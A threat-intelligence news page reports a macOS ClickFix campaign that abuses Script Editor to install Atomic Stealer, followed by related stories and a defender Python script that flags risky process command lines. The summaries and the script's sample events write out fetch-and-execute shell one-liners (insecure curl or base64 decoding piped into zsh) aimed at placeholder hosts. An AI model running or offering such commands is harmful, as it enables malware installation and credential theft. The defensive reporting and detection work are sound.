ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a ClickFix-style campaign targeting macOS users that swaps Terminal-based execution for Script Editor to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the applescript:// URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses curl with TLS certificate validation disabled, and pipes the response directly into zsh for in-memory execution.
The activity, discovered by Jamf Threat Labs, ultimately downloads and launches a Mach-O variant of Atomic Stealer, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me.
Timeline
Apr 9, 2026
Researchers link campaign to supporting infrastructure
Analysis tied the campaign to infrastructure including dryvecar.com, storage-fixes.squarespace.com, and cleanupmac.mssg.me. The operation was described as targeting macOS users to steal browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
Apr 9, 2026
Jamf Threat Labs identifies Atomic Stealer macOS campaign in the wild
Jamf researchers documented an active campaign delivering a variant of Atomic Stealer through Script Editor on macOS. They reported that the script fetched remote content with curl using disabled TLS certificate validation, executed it in memory, and ultimately downloaded a Mach-O payload.
Apr 9, 2026
Attackers shift ClickFix delivery from Terminal to macOS Script Editor
After Apple’s Terminal-focused protections, attackers adapted their technique by using the applescript:// URL scheme to open Script Editor with a pre-filled malicious AppleScript. The lure used fake Apple-themed disk cleanup pages to socially engineer users into running the script.
Apr 9, 2026
Apple adds Terminal paste-scanning protections in macOS 26.4
Apple introduced protections in macOS 26.4 to scan pasted commands in Terminal and warn users about potentially suspicious activity. The new safeguards were intended to reduce abuse of Terminal-based social engineering techniques such as ClickFix-style attacks.
Related Stories

ClickFix Social Engineering Campaigns Using Terminal Commands to Install Stealers
Multiple reports highlighted **ClickFix**-style social engineering that convinces users to paste attacker-supplied commands into a terminal, leading to infostealer installation. Malwarebytes documented a macOS lure impersonating *CleanMyMac* via `cleanmymacos[.]org`, where victims are instructed to run a Terminal command that prints a reassuring message, decodes a hidden (base64) destination, and then downloads and executes a remote shell script via `zsh`. The resulting payload installs **SHub Stealer**, which targets saved passwords, browser data, Apple Keychain contents, Telegram sessions, and cryptocurrency wallets; it can also tamper with wallet applications (e.g., *Exodus*, *Atomic Wallet*, *Ledger Live*) to enable later theft of recovery phrases. Microsoft threat intelligence (as reported by The Hacker News) described a parallel **Windows** ClickFix campaign that shifts from the traditional Run-dialog paste to **Windows Terminal** (`wt.exe`) using the `Win + X → I` shortcut, exploiting the tool’s administrative legitimacy to reduce suspicion and evade detections tuned to Run-dialog abuse. In that chain, users paste a hex-encoded/XOR-compressed command that spawns additional Terminal/PowerShell stages to decode scripts, download a ZIP payload plus a legitimate-but-renamed **7-Zip** binary, extract additional components, establish persistence via **scheduled tasks**, configure **Microsoft Defender exclusions**, and ultimately deploy **Lumma Stealer** (including use of `QueueUserAPC()` for injection).
1 month ago
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Yesterday
ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a **ClickFix**-style social-engineering campaign that abuses **Google sponsored search results** to funnel macOS users to malicious content hosted on legitimate platforms, including **Anthropic Claude public artifacts** (`claude.ai`) and **Medium** pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., `echo "..." | base64 -D | zsh` or `curl ... | zsh`). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated **~12,300 to 15,600 views**, indicating significant exposure (reported as **10,000+** and **15,000+** potential victims across coverage). The payloads deliver macOS information-stealing malware, including **MacSync**, which collects data such as **Keychain credentials, browser data, and cryptocurrency wallet files**. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into `/tmp/osalogging.zip`, and exfiltrating via HTTP POST to attacker infrastructure (e.g., `a2abotnet[.]com/gate`, with C2 paths like `a2abotnet[.]com/dynamic`). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
3 days ago
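As an added, defender-side example (not part of the original reporting, and not Jamf's or any other vendor's tooling), the script below triages process-telemetry events for the traits that recur across the main story and the related stories above: curl invoked with certificate validation disabled, remote or base64-decoded content piped straight into zsh/sh/bash, and a shell spawned by Script Editor or osascript rather than by Terminal. The events, the `example.invalid` hostnames, the parent-process names and the base64 string are all constructed for the example; the code only parses strings and never executes any command line it inspects.

```python
import os
import re
import shlex

# Constructed sample telemetry: (parent process name, command line), the two
# fields an EDR or unified-log collector would record for a process start.
# Every host, path and encoded string here is made up for this example.
SAMPLE_EVENTS = [
    ("Script Editor", 'sh -c "curl -k -s https://example.invalid/payload | zsh"'),
    ("Terminal", 'zsh -c "echo Q0xFQU4gVVAK | base64 -D | zsh"'),
    ("Terminal", "curl --insecure https://example.invalid/x.sh | sh"),
    ("Terminal", "curl -s https://example.invalid/file.txt -o /tmp/file.txt"),
    ("Terminal", "ls -la /Applications"),
    ("osascript", 'sh -c "echo hello"'),
    ("Script Editor",
     "sh -c 'curl -ks \"$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcA== | base64 -D)\" | zsh'"),
]

SHELLS = {"zsh", "sh", "bash"}
# Assumed parent-process names; adjust to what your telemetry source reports.
SCRIPT_HOSTS = {"Script Editor", "osascript"}
# base64 decode switches on macOS (-D) and GNU/newer BSD (-d, --decode).
DECODE_RE = re.compile(r"base64\s+(?:-[A-Za-z]*[dD]\b|--decode)")


def split_pipes(script):
    """Split a shell one-liner into pipeline stages, ignoring '|' inside quotes."""
    stages, buf, quote = [], [], None
    for ch in script:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
            buf.append(ch)
        elif ch == "|":
            stages.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    stages.append("".join(buf).strip())
    return [s for s in stages if s]


def safe_split(text):
    """shlex.split that degrades to whitespace splitting on unbalanced quotes."""
    try:
        return shlex.split(text)
    except ValueError:
        return text.split()


def unwrap_shell(argv):
    """For `sh -c "<script>"` style invocations, return the inner script."""
    if len(argv) >= 3 and os.path.basename(argv[0]) in SHELLS and argv[1] == "-c":
        return argv[2]
    return None


def curl_insecure(argv):
    """True if a curl argv disables certificate validation (-k, -ks, --insecure)."""
    for tok in argv[1:]:
        if tok == "--insecure":
            return True
        if tok.startswith("-") and not tok.startswith("--") and "k" in tok[1:]:
            return True
    return False


def analyze(parent, cmdline):
    """Return {'verdict': 'high'|'medium'|'none', 'findings': [...]} for one event."""
    findings = []
    argv = safe_split(cmdline)
    inner = unwrap_shell(argv)
    script = inner if inner is not None else cmdline
    stages = [s for s in (safe_split(p) for p in split_pipes(script)) if s]
    names = [os.path.basename(s[0]) for s in stages]
    ends_in_shell = len(stages) > 1 and names[-1] in SHELLS

    for stage, name in zip(stages, names):
        if name == "curl" and curl_insecure(stage):
            findings.append("curl with TLS certificate validation disabled")

    remote_to_shell = "curl" in names and ends_in_shell
    decoded_to_shell = bool(DECODE_RE.search(script)) and ends_in_shell
    if remote_to_shell:
        findings.append("remote content piped directly into a shell")
    if decoded_to_shell:
        findings.append("base64-decoded content feeds a shell")
    if parent in SCRIPT_HOSTS:
        findings.append(f"shell spawned by a script host ({parent})")

    if remote_to_shell or decoded_to_shell:
        verdict = "high"
    elif findings:
        verdict = "medium"
    else:
        verdict = "none"
    return {"verdict": verdict, "findings": findings}


def triage(events):
    """Analyze a batch of (parent, cmdline) events."""
    return [(parent, cmd, analyze(parent, cmd)) for parent, cmd in events]


if __name__ == "__main__":
    for parent, cmd, result in triage(SAMPLE_EVENTS):
        print(f"[{result['verdict']:6}] {parent}: {cmd}")
        for finding in result["findings"]:
            print(f"         - {finding}")
```

The two "high" conditions (remote or decoded content feeding a shell) are what all three delivery variants on this page share regardless of whether the lure lands in Terminal or Script Editor, so they are the rules worth alerting on; the script-host parent and the insecure curl flag are weaker on their own and only raise a "medium" so that a legitimate `osascript`-launched shell does not page anyone.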